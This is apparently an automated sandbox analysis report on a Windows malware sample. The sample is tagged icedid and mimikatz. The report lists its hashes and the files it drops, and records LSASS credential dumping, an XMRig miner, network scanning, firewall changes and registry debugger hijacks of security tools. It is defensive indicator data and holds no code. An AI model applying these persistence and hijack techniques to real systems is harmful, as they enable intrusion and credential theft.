Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
24-09-2024 20:24
Behavioral task
behavioral1
Sample
2024-09-24_621680c562cca67b906d780e91242883_hacktools_icedid_mimikatz.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2024-09-24_621680c562cca67b906d780e91242883_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20240802-en
General
-
Target
2024-09-24_621680c562cca67b906d780e91242883_hacktools_icedid_mimikatz.exe
-
Size
9.9MB
-
MD5
621680c562cca67b906d780e91242883
-
SHA1
faf6efc4f0e80f28656bee6df050137a80959fa4
-
SHA256
61c9353beb3c4005196f0c998bd54d2f9a43b17fdf99533964f0bd3faf84ab45
-
SHA512
8c205dc4291f50793a368636a7ad86805fb4fcd23f34d2de582f1a9c5514db042048580178e9422f8fc36eefebc37d65f413931e7efd11a80b2e91b5321b66c1
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
uidzkei.exedescription pid Process procid_target PID 1480 created 2156 1480 uidzkei.exe 38 -
Contacts a large (28852) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
Processes:
resource yara_rule behavioral2/memory/1492-177-0x00007FF6F2430000-0x00007FF6F2550000-memory.dmp xmrig behavioral2/memory/1492-181-0x00007FF6F2430000-0x00007FF6F2550000-memory.dmp xmrig behavioral2/memory/1492-198-0x00007FF6F2430000-0x00007FF6F2550000-memory.dmp xmrig behavioral2/memory/1492-215-0x00007FF6F2430000-0x00007FF6F2550000-memory.dmp xmrig behavioral2/memory/1492-224-0x00007FF6F2430000-0x00007FF6F2550000-memory.dmp xmrig behavioral2/memory/1492-233-0x00007FF6F2430000-0x00007FF6F2550000-memory.dmp xmrig behavioral2/memory/1492-245-0x00007FF6F2430000-0x00007FF6F2550000-memory.dmp xmrig behavioral2/memory/1492-251-0x00007FF6F2430000-0x00007FF6F2550000-memory.dmp xmrig behavioral2/memory/1492-265-0x00007FF6F2430000-0x00007FF6F2550000-memory.dmp xmrig behavioral2/memory/1492-323-0x00007FF6F2430000-0x00007FF6F2550000-memory.dmp xmrig behavioral2/memory/1492-324-0x00007FF6F2430000-0x00007FF6F2550000-memory.dmp xmrig behavioral2/memory/1492-326-0x00007FF6F2430000-0x00007FF6F2550000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
Processes:
resource yara_rule behavioral2/memory/1364-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/1364-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x00070000000234b9-6.dat mimikatz behavioral2/memory/1468-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/1316-138-0x00007FF6EA4C0000-0x00007FF6EA5AE000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
Processes:
uidzkei.exewpcap.exedescription ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts uidzkei.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts uidzkei.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
Processes:
uidzkei.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" uidzkei.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe uidzkei.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe uidzkei.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe uidzkei.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe uidzkei.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" uidzkei.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe uidzkei.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe uidzkei.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" uidzkei.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe uidzkei.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe uidzkei.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe uidzkei.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" uidzkei.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" uidzkei.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe uidzkei.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" uidzkei.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" uidzkei.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" uidzkei.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" uidzkei.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" uidzkei.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" uidzkei.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe uidzkei.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe uidzkei.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe uidzkei.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" uidzkei.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" uidzkei.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe uidzkei.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" uidzkei.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe uidzkei.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" uidzkei.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" uidzkei.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe uidzkei.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" uidzkei.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" uidzkei.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe uidzkei.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe uidzkei.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" uidzkei.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" uidzkei.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe uidzkei.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe uidzkei.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid Process 4324 netsh.exe 2516 netsh.exe -
Executes dropped EXE 28 IoCs
Processes:
uidzkei.exeuidzkei.exewpcap.exebwayqfivf.exevfshost.exeviwlddied.exexohudmc.exehmdriy.exeizlpad.exeviwlddied.exeviwlddied.exeviwlddied.exeviwlddied.exeviwlddied.exeviwlddied.exeviwlddied.exeviwlddied.exeuidzkei.exeviwlddied.exeviwlddied.exeviwlddied.exeviwlddied.exeviwlddied.exeviwlddied.exeviwlddied.exeviwlddied.exezubvfcbzt.exeuidzkei.exepid Process 1468 uidzkei.exe 1480 uidzkei.exe 724 wpcap.exe 3644 bwayqfivf.exe 1316 vfshost.exe 4980 viwlddied.exe 2984 xohudmc.exe 2468 hmdriy.exe 1492 izlpad.exe 2416 viwlddied.exe 4800 viwlddied.exe 3280 viwlddied.exe 4812 viwlddied.exe 3512 viwlddied.exe 3720 viwlddied.exe 1744 viwlddied.exe 696 viwlddied.exe 4616 uidzkei.exe 4652 viwlddied.exe 1268 viwlddied.exe 3536 viwlddied.exe 1908 viwlddied.exe 3488 viwlddied.exe 1812 viwlddied.exe 3796 viwlddied.exe 2600 viwlddied.exe 1180 zubvfcbzt.exe 4484 uidzkei.exe -
Loads dropped DLL 12 IoCs
Processes:
wpcap.exebwayqfivf.exepid Process 724 wpcap.exe 724 wpcap.exe 724 wpcap.exe 724 wpcap.exe 724 wpcap.exe 724 wpcap.exe 724 wpcap.exe 724 wpcap.exe 724 wpcap.exe 3644 bwayqfivf.exe 3644 bwayqfivf.exe 3644 bwayqfivf.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 68 ifconfig.me 69 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
Processes:
xohudmc.exeuidzkei.exewpcap.exedescription ioc Process File created C:\Windows\SysWOW64\hmdriy.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 uidzkei.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content uidzkei.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 uidzkei.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache uidzkei.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData uidzkei.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE uidzkei.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft uidzkei.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 uidzkei.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\hmdriy.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies uidzkei.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDAB91A53CE5876D153BF0B6B3BA7DCE uidzkei.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDAB91A53CE5876D153BF0B6B3BA7DCE uidzkei.exe -
Processes:
resource yara_rule behavioral2/files/0x0007000000023505-134.dat upx behavioral2/memory/1316-135-0x00007FF6EA4C0000-0x00007FF6EA5AE000-memory.dmp upx behavioral2/memory/1316-138-0x00007FF6EA4C0000-0x00007FF6EA5AE000-memory.dmp upx behavioral2/files/0x0007000000023510-141.dat upx behavioral2/memory/4980-142-0x00007FF7B53C0000-0x00007FF7B541B000-memory.dmp upx behavioral2/memory/4980-154-0x00007FF7B53C0000-0x00007FF7B541B000-memory.dmp upx behavioral2/files/0x000700000002350d-163.dat upx behavioral2/memory/1492-164-0x00007FF6F2430000-0x00007FF6F2550000-memory.dmp upx behavioral2/memory/2416-170-0x00007FF7B53C0000-0x00007FF7B541B000-memory.dmp upx behavioral2/memory/4800-174-0x00007FF7B53C0000-0x00007FF7B541B000-memory.dmp upx behavioral2/memory/1492-177-0x00007FF6F2430000-0x00007FF6F2550000-memory.dmp upx behavioral2/memory/3280-179-0x00007FF7B53C0000-0x00007FF7B541B000-memory.dmp upx behavioral2/memory/1492-181-0x00007FF6F2430000-0x00007FF6F2550000-memory.dmp upx behavioral2/memory/4812-184-0x00007FF7B53C0000-0x00007FF7B541B000-memory.dmp upx behavioral2/memory/3512-188-0x00007FF7B53C0000-0x00007FF7B541B000-memory.dmp upx behavioral2/memory/3720-192-0x00007FF7B53C0000-0x00007FF7B541B000-memory.dmp upx behavioral2/memory/1744-196-0x00007FF7B53C0000-0x00007FF7B541B000-memory.dmp upx behavioral2/memory/1492-198-0x00007FF6F2430000-0x00007FF6F2550000-memory.dmp upx behavioral2/memory/696-205-0x00007FF7B53C0000-0x00007FF7B541B000-memory.dmp upx behavioral2/memory/4652-209-0x00007FF7B53C0000-0x00007FF7B541B000-memory.dmp upx behavioral2/memory/1268-213-0x00007FF7B53C0000-0x00007FF7B541B000-memory.dmp upx behavioral2/memory/1492-215-0x00007FF6F2430000-0x00007FF6F2550000-memory.dmp upx behavioral2/memory/3536-218-0x00007FF7B53C0000-0x00007FF7B541B000-memory.dmp upx behavioral2/memory/1908-222-0x00007FF7B53C0000-0x00007FF7B541B000-memory.dmp upx behavioral2/memory/1492-224-0x00007FF6F2430000-0x00007FF6F2550000-memory.dmp upx behavioral2/memory/3488-227-0x00007FF7B53C0000-0x00007FF7B541B000-memory.dmp upx behavioral2/memory/1812-230-0x00007FF7B53C0000-0x00007FF7B541B000-memory.dmp upx behavioral2/memory/3796-232-0x00007FF7B53C0000-0x00007FF7B541B000-memory.dmp upx behavioral2/memory/1492-233-0x00007FF6F2430000-0x00007FF6F2550000-memory.dmp upx behavioral2/memory/2600-235-0x00007FF7B53C0000-0x00007FF7B541B000-memory.dmp upx behavioral2/memory/1492-245-0x00007FF6F2430000-0x00007FF6F2550000-memory.dmp upx behavioral2/memory/1492-251-0x00007FF6F2430000-0x00007FF6F2550000-memory.dmp upx behavioral2/memory/1492-265-0x00007FF6F2430000-0x00007FF6F2550000-memory.dmp upx behavioral2/memory/1492-323-0x00007FF6F2430000-0x00007FF6F2550000-memory.dmp upx behavioral2/memory/1492-324-0x00007FF6F2430000-0x00007FF6F2550000-memory.dmp upx behavioral2/memory/1492-326-0x00007FF6F2430000-0x00007FF6F2550000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
Processes:
wpcap.exedescription ioc Process File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe -
Drops file in Windows directory 60 IoCs
Processes:
uidzkei.exezubvfcbzt.exe2024-09-24_621680c562cca67b906d780e91242883_hacktools_icedid_mimikatz.execmd.exedescription ioc Process File created C:\Windows\iyczurqrb\UnattendGC\specials\docmicfg.exe uidzkei.exe File created C:\Windows\tlgtansf\docmicfg.xml uidzkei.exe File created C:\Windows\tlgtansf\schoedcl.xml uidzkei.exe File opened for modification C:\Windows\iyczurqrb\sdpfffren\Result.txt zubvfcbzt.exe File created C:\Windows\iyczurqrb\UnattendGC\specials\trch-1.dll uidzkei.exe File created C:\Windows\iyczurqrb\UnattendGC\specials\crli-0.dll uidzkei.exe File created C:\Windows\tlgtansf\uidzkei.exe 2024-09-24_621680c562cca67b906d780e91242883_hacktools_icedid_mimikatz.exe File created C:\Windows\iyczurqrb\UnattendGC\AppCapture64.dll uidzkei.exe File opened for modification C:\Windows\iyczurqrb\Corporate\log.txt cmd.exe File created C:\Windows\iyczurqrb\sdpfffren\bwayqfivf.exe uidzkei.exe File created C:\Windows\iyczurqrb\UnattendGC\specials\trfo-2.dll uidzkei.exe File created C:\Windows\iyczurqrb\UnattendGC\specials\ucl.dll uidzkei.exe File created C:\Windows\iyczurqrb\UnattendGC\specials\tibe-2.dll uidzkei.exe File created C:\Windows\iyczurqrb\UnattendGC\specials\ssleay32.dll uidzkei.exe File created C:\Windows\iyczurqrb\UnattendGC\specials\spoolsrv.xml uidzkei.exe File created C:\Windows\iyczurqrb\UnattendGC\specials\schoedcl.xml uidzkei.exe File opened for modification C:\Windows\tlgtansf\vimpcsvc.xml uidzkei.exe File created C:\Windows\iyczurqrb\UnattendGC\specials\libxml2.dll uidzkei.exe File created C:\Windows\iyczurqrb\UnattendGC\AppCapture32.dll uidzkei.exe File created C:\Windows\iyczurqrb\sdpfffren\scan.bat uidzkei.exe File created C:\Windows\iyczurqrb\UnattendGC\specials\docmicfg.xml uidzkei.exe File created C:\Windows\iyczurqrb\sdpfffren\ip.txt uidzkei.exe File created C:\Windows\iyczurqrb\sdpfffren\wpcap.dll uidzkei.exe File created C:\Windows\iyczurqrb\sdpfffren\Packet.dll uidzkei.exe File created C:\Windows\iyczurqrb\UnattendGC\spoolsrv.xml uidzkei.exe File created C:\Windows\iyczurqrb\Corporate\mimidrv.sys uidzkei.exe File opened for modification C:\Windows\tlgtansf\uidzkei.exe 2024-09-24_621680c562cca67b906d780e91242883_hacktools_icedid_mimikatz.exe File created C:\Windows\iyczurqrb\UnattendGC\specials\zlib1.dll uidzkei.exe File created C:\Windows\iyczurqrb\UnattendGC\specials\spoolsrv.exe uidzkei.exe File created C:\Windows\iyczurqrb\UnattendGC\specials\vimpcsvc.exe uidzkei.exe File created C:\Windows\iyczurqrb\UnattendGC\docmicfg.xml uidzkei.exe File created C:\Windows\iyczurqrb\UnattendGC\specials\cnli-1.dll uidzkei.exe File created C:\Windows\iyczurqrb\upbdrjv\swrpwe.exe uidzkei.exe File created C:\Windows\iyczurqrb\UnattendGC\specials\svschost.exe uidzkei.exe File created C:\Windows\iyczurqrb\UnattendGC\specials\exma-1.dll uidzkei.exe File created C:\Windows\iyczurqrb\UnattendGC\specials\vimpcsvc.xml uidzkei.exe File created C:\Windows\tlgtansf\svschost.xml uidzkei.exe File opened for modification C:\Windows\tlgtansf\spoolsrv.xml uidzkei.exe File created C:\Windows\iyczurqrb\Corporate\mimilib.dll uidzkei.exe File created C:\Windows\iyczurqrb\UnattendGC\specials\coli-0.dll uidzkei.exe File created C:\Windows\iyczurqrb\UnattendGC\vimpcsvc.xml uidzkei.exe File opened for modification C:\Windows\tlgtansf\schoedcl.xml uidzkei.exe File created C:\Windows\iyczurqrb\sdpfffren\wpcap.exe uidzkei.exe File created C:\Windows\iyczurqrb\UnattendGC\specials\tucl-1.dll uidzkei.exe File created C:\Windows\iyczurqrb\UnattendGC\svschost.xml uidzkei.exe File created C:\Windows\ime\uidzkei.exe uidzkei.exe File created C:\Windows\iyczurqrb\sdpfffren\zubvfcbzt.exe uidzkei.exe File created C:\Windows\iyczurqrb\UnattendGC\specials\posh-0.dll uidzkei.exe File created C:\Windows\iyczurqrb\UnattendGC\specials\schoedcl.exe uidzkei.exe File created C:\Windows\tlgtansf\spoolsrv.xml uidzkei.exe File opened for modification C:\Windows\tlgtansf\svschost.xml uidzkei.exe File created C:\Windows\iyczurqrb\Corporate\vfshost.exe uidzkei.exe File opened for modification C:\Windows\iyczurqrb\sdpfffren\Packet.dll uidzkei.exe File created C:\Windows\iyczurqrb\UnattendGC\specials\xdvl-0.dll uidzkei.exe File created C:\Windows\iyczurqrb\UnattendGC\schoedcl.xml uidzkei.exe File created C:\Windows\iyczurqrb\UnattendGC\specials\svschost.xml uidzkei.exe File created C:\Windows\tlgtansf\vimpcsvc.xml uidzkei.exe File created C:\Windows\iyczurqrb\UnattendGC\Shellcode.ini uidzkei.exe File created C:\Windows\iyczurqrb\UnattendGC\specials\libeay32.dll uidzkei.exe File opened for modification C:\Windows\tlgtansf\docmicfg.xml uidzkei.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid Process 1316 sc.exe 4048 sc.exe 2392 sc.exe 3692 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exedescription ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
